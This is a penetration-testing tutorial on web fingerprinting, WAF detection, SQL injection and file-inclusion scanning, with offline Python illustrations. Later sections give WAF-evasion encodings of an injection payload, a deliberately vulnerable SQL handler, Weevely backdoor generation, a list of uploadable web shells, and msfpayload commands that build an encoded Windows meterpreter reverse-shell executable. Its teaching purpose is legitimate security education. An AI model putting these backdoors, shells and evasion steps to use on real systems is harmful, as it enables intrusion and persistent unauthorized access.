Web Analysis, Vulnerability Assessment and Exploitation

CMS Identification

  • BlindElephant is a Python-based tool for fingerprinting web applications. It attempts to discover the version in use by fetching static files at known locations and comparing their hashes against hashes pre-computed for each released version of those files
  • root@root:/pentest/web/blindelephant/src/blindelephant# python BlindElephant.py [options] url appName
  • CMS-Explorer is a web application fingerprinting tool (written in Perl) that identifies the type of CMS in use, so the attack can be planned around that information. It has some extra advantages, such as checking OSVDB for vulnerabilities in the particular plugin or CMS detected, updating its WordPress and Drupal plugin lists, verbosity control, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT.
root@root:/pentest/web/cms-explorer# ./cms-explorer.pl -url target -type type [options]
For a WordPress site:
./cms-explorer.pl -url http://example.com -type wordpress

For a Drupal site:

./cms-explorer.pl -url http://example.com -type drupal
  • WhatWeb has over 900 plugins for scanning purposes, supports proxies (including Tor), accepts IP ranges in Nmap-style notation, does fuzzy matching, and so forth
  • root@root:/pentest/web/whatweb# ./whatweb target.com
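To make the hash-comparison idea behind BlindElephant concrete, here is an added Python example (not BlindElephant's own code) of the technique: it builds a fingerprint table from constructed release contents, then narrows down the version of a constructed target by hashing whatever static files the target still serves. RELEASES, SAMPLE_SITE, the paths and the file bodies are made up for the example; a live run would replace make_fetch with HTTP GETs against the target's base URL.

```python
"""Version fingerprinting from the hashes of static files, the technique BlindElephant
applies. Added illustration, not BlindElephant's code: the releases, file bodies and
the 'site' being probed are constructed here so that it runs offline."""
import hashlib
from typing import Callable, Dict, Optional, Set

# Constructed release contents: version -> {url path: file bytes}. A real database
# holds digests of every static file (js, css, readme, ...) of every known release.
RELEASES: Dict[str, Dict[str, bytes]] = {
    "1.0": {"/readme.txt": b"App 1.0\n", "/js/app.js": b"var v=1;\n", "/css/style.css": b"body{}\n"},
    "1.1": {"/readme.txt": b"App 1.1\n", "/js/app.js": b"var v=1;\n", "/css/style.css": b"body{}\n"},
    "2.0": {"/readme.txt": b"App 2.0\n", "/js/app.js": b"var v=2;\n", "/css/style.css": b"body{margin:0}\n"},
}


def sha1(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def build_fingerprint_db(releases: Dict[str, Dict[str, bytes]]) -> Dict[str, Dict[str, Set[str]]]:
    """path -> {digest -> versions that ship exactly that file}. A file identical across
    releases (app.js in 1.0 and 1.1) maps one digest to several versions."""
    db: Dict[str, Dict[str, Set[str]]] = {}
    for version, files in releases.items():
        for path, body in files.items():
            db.setdefault(path, {}).setdefault(sha1(body), set()).add(version)
    return db


def identify_version(fetch: Callable[[str], Optional[bytes]], db: Dict[str, Dict[str, Set[str]]]) -> Set[str]:
    """Narrow the candidate versions. fetch(path) returns the body or None (404/error).
    Every reachable file with a known digest intersects the candidate set; a missing
    file or an unknown digest (locally modified file) is no evidence either way.
    An empty result means the evidence was contradictory (mixed or patched install)."""
    candidates: Optional[Set[str]] = None
    for path, digests in db.items():
        body = fetch(path)
        if body is None:
            continue
        versions = digests.get(sha1(body))
        if versions is None:
            continue
        candidates = set(versions) if candidates is None else candidates & versions
        if not candidates:
            break
    return candidates or set()


def make_fetch(site_files: Dict[str, bytes]) -> Callable[[str], Optional[bytes]]:
    """Stand-in for an HTTP GET of base_url + path; returns None where the site has no file."""
    return lambda path: site_files.get(path)


# Constructed target: a 1.1 install whose style.css has been customised by the site owner.
SAMPLE_SITE = {"/readme.txt": b"App 1.1\n", "/js/app.js": b"var v=1;\n", "/css/style.css": b"body{color:red}\n"}

if __name__ == "__main__":
    db = build_fingerprint_db(RELEASES)
    print(identify_version(make_fetch(SAMPLE_SITE), db))
```

The customised style.css has a digest no release shipped, so it is skipped rather than counted against the target; readme.txt alone pins the version, and app.js (shared by 1.0 and 1.1) only confirms it. An install with readme.txt deleted is still identified from the remaining files, and one whose files point at different versions yields an empty set rather than a guess.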

IDS-IPS Detection:


  • Waffit (wafw00f) is a web application firewall detection tool. Most WAFs can be fingerprinted from the headers, cookies and block pages they add to responses, and signature-based rules can often be bypassed by encoding the attack parameter
  • /pentest/web/waffit# python wafw00f.py http://www.target.com/
  • UA-Tester is designed to automatically check a given URL using a list of standard and non-standard User-Agent strings provided by the user (one per line). The results of these checks are then reported to the user for further manual analysis where required. Gathered data includes response codes, the resulting URL in the case of a 30x response, the MD5 and length of the response body, and selected Server headers.
  • /pentest/enumeration/web/ua-tester# ./UATester.py -u www.example.com -f ./useragentlist.txt -v
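The following added Python example (not code from Waffit/wafw00f or UA-Tester) shows the response-differencing that both tools rely on: the fields UA-Tester records per User-Agent, clustering of User-Agents that received identical responses, a benign-versus-attack comparison of the kind wafw00f makes to spot a WAF, and the encoded forms of an attack parameter that get re-sent when the plain one is blocked. All responses, the header-to-vendor table and the block-page phrases are constructed assumptions for the example, not either tool's signature set.

```python
"""Response fingerprinting and differencing: the idea behind UA-Tester (same URL, many
User-Agents) and WAF detectors such as wafw00f (harmless request vs. one carrying an
attack string). Added example, not code from either tool. All responses below are
constructed, so nothing touches the network; the header-to-product table and the
block-page phrases are assumptions for the example, not wafw00f's signature set."""
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Tuple
from urllib.parse import quote


@dataclass
class Response:
    status: int
    headers: Dict[str, str]      # header names lower-cased
    body: bytes = b""


def fingerprint(resp: Response) -> Tuple[int, str, str, int, str]:
    """The fields UA-Tester records per User-Agent: status, Location for a 30x,
    MD5 and length of the body, and the Server header."""
    location = resp.headers.get("location", "") if 300 <= resp.status < 400 else ""
    return (resp.status, location, hashlib.md5(resp.body).hexdigest(),
            len(resp.body), resp.headers.get("server", ""))


def group_by_fingerprint(results: Dict[str, Response]) -> Dict[tuple, List[str]]:
    """Cluster User-Agents that got identical treatment."""
    groups: Dict[tuple, List[str]] = {}
    for ua, resp in results.items():
        groups.setdefault(fingerprint(resp), []).append(ua)
    return groups


def odd_ones_out(results: Dict[str, Response]) -> List[str]:
    """User-Agents that received a response nobody else did: the ones worth a manual
    look (crawler-only content, mobile redirect, tool UA blocked)."""
    return [uas[0] for uas in group_by_fingerprint(results).values() if len(uas) == 1]


# Assumed product markers for this example (real detectors carry many more per vendor).
WAF_HEADERS = {"cf-ray": "Cloudflare", "x-sucuri-id": "Sucuri"}
BLOCK_PAGE_MARKERS = (b"access denied", b"request blocked", b"web application firewall")


def detect_waf(benign: Response, attack: Response) -> Dict[str, object]:
    """wafw00f-style check: the same URL requested once normally and once with an
    obvious attack string in a parameter. Evidence is a changed status code typical
    of a block, a vendor header on either reply, or block-page wording in the body."""
    evidence: List[str] = []
    if attack.status != benign.status and attack.status in (403, 406, 419, 429, 501, 503):
        evidence.append(f"attack request answered {attack.status}, benign request got {benign.status}")
    for hdr, product in WAF_HEADERS.items():
        if hdr in attack.headers or hdr in benign.headers:
            evidence.append(f"header {hdr} identifies {product}")
    if attack.body != benign.body and any(m in attack.body.lower() for m in BLOCK_PAGE_MARKERS):
        evidence.append("block-page text in attack response")
    return {"waf_detected": bool(evidence), "evidence": evidence}


def encoded_variants(payload: str) -> Dict[str, str]:
    """Alternative encodings of one attack parameter to re-send when the plain form is
    blocked: a rule matching the literal string misses them, while a backend that
    decodes (or double-decodes) the value still receives the original."""
    once = quote(payload, safe="")
    return {
        "plain": payload,
        "url": once,
        "double_url": quote(once, safe=""),
        "mixed_case": "".join(c.lower() if i % 2 else c.upper() for i, c in enumerate(payload)),
    }


# Constructed samples: one page served to four User-Agents, then a benign/attack pair.
SAMPLE_UA_RESULTS = {
    "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Firefox/115.0": Response(200, {"server": "nginx"}, b"<html>home</html>"),
    "Mozilla/5.0 (Macintosh; Intel Mac OS X) Safari/605.1.15": Response(200, {"server": "nginx"}, b"<html>home</html>"),
    "Googlebot/2.1 (+http://www.google.com/bot.html)": Response(200, {"server": "nginx"}, b"<html>home (crawler view)</html>"),
    "curl/8.4.0": Response(302, {"server": "nginx", "location": "/blocked"}),
}
SAMPLE_BENIGN = Response(200, {"server": "nginx"}, b"<html>home</html>")
SAMPLE_ATTACK = Response(403, {"server": "nginx", "cf-ray": "7a1b2c3d4e5f6a7b-FRA"},
                         b"<html>Access Denied - request blocked</html>")

if __name__ == "__main__":
    print(odd_ones_out(SAMPLE_UA_RESULTS))
    print(detect_waf(SAMPLE_BENIGN, SAMPLE_ATTACK))
    print(encoded_variants("' OR 1=1--"))
```

Two of the four User-Agents land in one cluster and the crawler and curl strings stand alone, which is exactly what the manual review step should look at. A WAF verdict with no evidence list is deliberately reported as "not detected" rather than inferred from the status code alone, since a plain 403 can also come from the application.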
Open Source Analysis:
  1.  GHDB (Google Hacking Database)
  2.  Xssed
  3.  Revhosts
Web Crawler:
  • Webshag has both a CLI and a GUI for crawling web sites
  • /pentest/enumeration/web/webshag# webshag_cli.py [-U | [options] target(s)]

Vulnerability Assessment And Exploitation
  • joomscan is a Joomla! vulnerability scanner
  • /pentest/web/scanners/joomscan# ./joomscan.pl -u victim.com
  • SqlMap is another good tool in the vulnerability assessment category. It tests whether the parameters of the target URL are SQL injectable. In the example run referred to here, sqlmap reports that the parameter "newId" is injectable; the URL passed with -u must carry that parameter, and -f additionally fingerprints the back-end DBMS
  • ./sqlmap.py -u "http://target.com/?newId=1" -f
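As an added Python example (not sqlmap's code) of what "testing whether a parameter is injectable" means in practice, here is a boolean-based blind check run against a constructed in-memory SQLite application, once with a deliberately vulnerable handler and once with a validated, parameterized one. The table, the newId column and both handlers are made up for the example; against a live target, request() would be an HTTP GET with the parameter value substituted.

```python
"""Boolean-based blind SQL injection test, the kind of probe sqlmap fires at each
parameter. Added example, not sqlmap code. The 'application' is a constructed
in-memory SQLite handler in two versions, one deliberately vulnerable and one
parameterized, so the test runs offline."""
import sqlite3
from typing import Callable


def _make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (newId INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first post"), (2, "second post")])
    return con


CON = _make_db()


def vulnerable_handler(new_id: str) -> str:
    """Deliberately vulnerable: the raw parameter is pasted into the SQL text."""
    row = CON.execute(f"SELECT title FROM news WHERE newId = {new_id}").fetchone()
    return f"<h1>{row[0]}</h1>" if row else "<h1>not found</h1>"


def safe_handler(new_id: str) -> str:
    """Hardened: the value is validated as an integer and bound as a parameter, so the
    probe's ' AND 1=1' never reaches the SQL parser."""
    try:
        bound = int(new_id)
    except ValueError:
        return "<h1>not found</h1>"
    row = CON.execute("SELECT title FROM news WHERE newId = ?", (bound,)).fetchone()
    return f"<h1>{row[0]}</h1>" if row else "<h1>not found</h1>"


def is_boolean_injectable(request: Callable[[str], str], value: str) -> bool:
    """Three requests: the original value (baseline), value + ' AND 1=1' (always true)
    and value + ' AND 1=2' (always false). If the true probe reproduces the baseline
    page while the false probe changes it, the value is being evaluated as SQL.
    sqlmap uses random integers (AND 4517=4517) rather than 1=1 to dodge trivial
    filters and compares pages fuzzily rather than byte for byte.
    Inconclusive cases (baseline already 'not found', or an error on every probe)
    come back False; confirm manually rather than reading that as 'safe'."""
    def page(v: str) -> str:
        try:
            return request(v)
        except Exception as exc:  # an error page is a distinct response, not a crash
            return f"__error__:{type(exc).__name__}"
    baseline = page(value)
    true_probe = page(f"{value} AND 1=1")
    false_probe = page(f"{value} AND 1=2")
    return true_probe == baseline and false_probe != baseline


if __name__ == "__main__":
    print("vulnerable handler injectable:", is_boolean_injectable(vulnerable_handler, "1"))
    print("hardened handler injectable:", is_boolean_injectable(safe_handler, "1"))
```

The hardened handler answers "not found" to both probes, so the true probe no longer matches the baseline and the test correctly reports nothing; the same happens for a value that does not exist in the table, which is why a negative result is inconclusive rather than a clean bill of health.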

  • fimap is a Python-based tool that can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in web apps.
  • fimap -u "http://www.example.com/index.php?inc=index.php"

  • XSSer is an automatic framework to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing filters and several other injection modes
  • ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch=" --referer "666.666.666.666" --user-agent "correctaudit"

  • theHarvester gathers user names, e-mail addresses and hostnames/subdomains from public sources (for example Google, Bing, etc.). It helps the pentester during the initial stage of a VA/PT. It can be found under the "Web open source assessment" option of web vulnerability assessment
  • ./theHarvester.py -d [target domain] -b [data source]

  • Shodan can be used to gather a range of intelligence about target devices connected to the internet. We can, for example, search for network devices such as routers, VoIP phones, printers and cameras. To check whether particular services are exposed on the target domain, the query syntax is:
  • Syntax: hostname:target.com port:80,21,22
  • w3af is a web application auditing and attack framework. It is divided into plugin categories such as attack, audit, exploit, discovery, evasion, brute force and mangle, which are enabled as needed. Each category contains plugins for specific tasks; for example, if only SQL injection needs to be audited, the sqli plugin is selected in the audit category.

  • Weevely is a stealthy PHP backdoor designed to stay beneath the radar. It provides a telnet-like connection and dynamically probes for system-like functions to get around PHP security restrictions: it looks for system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and python_eval() and uses whichever of them are enabled on the remote server. The following command generates the backdoor file:
  • weevely.py -g -o filename -p password

  • These are useful in various situations, for example when the web application has a vulnerability (such as an unrestricted file upload) that lets us upload a backdoor. Choose the shell that matches the target's server-side technology (a PHP-based backdoor for a site coded in PHP, and so on). The following web shells are available:
  • simple-backdoor.php
  • php-backdoor.php
  • jsp-reverse.jsp
  • cmdjsp.jsp
  • cmd-asp-5.1.asp
  • cmdasp.aspx
  • perlcmd.cgi
  • cfexec.cfm

  • Metasploit can be used to create backdoors for maintaining access to the target server, with the help of msfpayload (since replaced by msfvenom, which takes the same payload names and LHOST/LPORT options). msfpayload and msfencode are stand-alone shell commands, not msfconsole commands. The steps for creating a backdoor with msfpayload are as follows
  • msfpayload windows/meterpreter/reverse_tcp S (show the payload's summary and options)
  • msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 R
  • msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=1337 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe > anonymous.exe